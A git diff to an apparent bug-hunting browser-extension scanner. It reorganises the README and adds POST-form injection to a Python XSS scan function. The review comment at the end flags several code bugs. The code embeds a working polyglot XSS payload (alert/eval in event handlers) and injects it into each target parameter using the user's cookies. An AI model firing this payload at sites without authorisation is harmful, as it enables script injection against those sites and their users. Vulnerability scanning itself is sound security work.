diff --git a/README.md b/README.md
index 1e09afd..7f8760d 100755
--- a/README.md
+++ b/README.md
@@ -8,6 +8,18 @@ Currently it scans for:
 - Local File Inclusion
 - Remote Commands Execution
+All the features are:
+- Detect if the server is up
+- Start/Stop button
+- New XSS vectors, work in different contexts (JS var, JS function, inside HTML tag, outside HTML tag)
+- Basic page to list the vulnerabilities URL and TYPE
+- Time based SQLi scanner using polyglot vectors (MySQL, SQLite, Oracle, Postgresql, SQL Server)
+- RCE scanner using polyglot vectors based on time
+- New logo for the extension
+- Re-use your cookies and user-agent to get access to page with cookie-authentication
+- Export vulnerabilities into a CSV file
+- Launch scan when a form is submitted or a page is opened via the URL bar
+
 **Warnings :** Do not use this extension for illegal purpose, the main goal of it is to simplify the life of bug hunters. It's a **BETA version**, many improvements will come don't worry
 ## Install
@@ -36,22 +48,6 @@ var config_server = "http://127.0.0.1:8000";
 4 - Browse the internet ! (Don't forget to start the extension by clicking the 'START' button) You can try the Error SQL, Blind SQL, LFI with Damn Vulnerable Web App
-## New features
-- Detect if the server is up
-- Start/Stop button
-- New XSS vectors, work in different contexts (JS var, JS function, inside HTML tag, outside HTML tag)
-- Basic page to list the vulnerabilities URL and TYPE
-- Time based SQLi scanner using polyglot vectors (MySQL, SQLite, Oracle, Postgresql, SQL Server)
-- RCE scanner using polyglot vectors based on time
-- New logo for the extension
-- Re-use your cookies and user-agent to get access to page with cookie-authentication
-- Export vulnerabilities into a CSV file
-- Launch scan when a form is submitted or a page is opened via the URL bar
-
-## TODO - Work in progress
-- Should detect target in source code.. (list of targets, then launch scan)
-- Do xss for POST with data dict
-
 ## Thanks
 - Polyglot vector for SQL injections [The Ultimate SQL Injection Payload](https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/)
 - Polyglot vector for XSS injection 1 [One vector to rule them all](http://www.thespanner.co.uk/2010/09/15/one-vector-to-rule-them-all/)
diff --git a/Server/scans.py b/Server/scans.py
index eee88d7..d96b7cd 100644
--- a/Server/scans.py
+++ b/Server/scans.py
@@ -6,21 +6,33 @@ import requests
 import datetime
 import re
-"""scan_xss /!\ TODO : POST request (check method, data)
+"""scan_xss
 Description: inject a polyglot vector for XSS in every parameter, then it checks if an alert was triggered
 Parameters: vulns - list of vulnerabilities, url - address of the target, fuzz - parameter we modify
 """
 def scan_xss(method, vulns, url, fuzz, cookie, useragent, firefox, data):
 payload = 'jaVasCript:alert(1)//" name=alert(1) onErrOr=eval(name) src=1 autofocus oNfoCus=eval(name)>" >
@gmail.com\'-->" >">/\'">]]>%>?>">[img=1,name=/alert(1)/.source]"'
-
+ print repr(fuzz),"fuzz"
 try:
 with firefox.start() as session:
-
- # Send GET XSS
- inject = url.replace(fuzz+"=", fuzz+"="+payload)
- page, extra_resources = session.open(inject, headers={'Cookie':cookie}, user_agent=useragent)
- result, resources = session.wait_for_alert(1)
+
+ # POST
+ if (method == 'POST' and fuzz != ''):
+ inject = dict(data)
+ inject[fuzz] = inject[fuzz] + payload
+ del inject['']
+ page, extra_resources = session.open(url, headers={'Cookie':cookie}, user_agent=useragent)
+ result, resources = session.fill("form", inject)
+ page, resources = session.call("form", "submit", expect_loading=True)
+ result, resources = session.wait_for_alert(1)
+ inject = url + ":" + fuzz + ":" + inject[fuzz]
+
+ # GET
+ if (method == 'GET'):
+ inject = url.replace(fuzz+"=", fuzz+"="+payload)
+ page, extra_resources = session.open(inject, headers={'Cookie':cookie}, user_agent=useragent)
+ result, resources = session.wait_for_alert(1)
+
 # Detect XSS result with an alert
 if result == '1':
@@ -31,7 +43,13 @@ def scan_xss(method, vulns, url, fuzz, cookie, useragent, firefox, data):
 print "\t\t\033[94mXSS Failed \033[0m for ", fuzz, " with the payload :", payload
 except Exception, e:
- print "\t\t\033[94mXSS Failed \033[0m for ", fuzz, " with the payload :", payload
+ if "alert" in str(e):
+ print "\t\t\033[93mXSS Detected \033[0m for ", fuzz, " with the payload :", payload
+ inject = url + ":" + fuzz + ":" + payload
+ vulns['xss'] += 1
+ vulns['list'] += 'XSS|TYPE|'+inject+'|DELIMITER|'
+ else:
+ print "\t\t\033[94mXSS Failed \033[0m for ", fuzz, " with the payload :", payload
 """scan_sql
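Review bot: In the new POST branch of scan_xss, `result` is assigned only inside the two `if` bodies, so a POST call with an empty `fuzz` (or any other method value) reaches `if result == '1':` with `result` unbound, and the broad `except Exception` below reports that as "XSS Failed" instead of as a scanner error; initialise `result = None` before the branches and make the GET `if` an `elif`. `del inject['']` likewise raises KeyError whenever the form data has no `''` key, which silently aborts the scan of that parameter for the same reason; `inject.pop('', None)` drops the key only when it is present. `print repr(fuzz),"fuzz"` reads as leftover debugging output. The except block in the following hunk compounds this by counting any exception whose message contains "alert" as a confirmed finding — catching the specific exception type the session raises for an unexpected dialog would be more reliable, though which type that is is not visible here. scan_xss's body continues past this hunk.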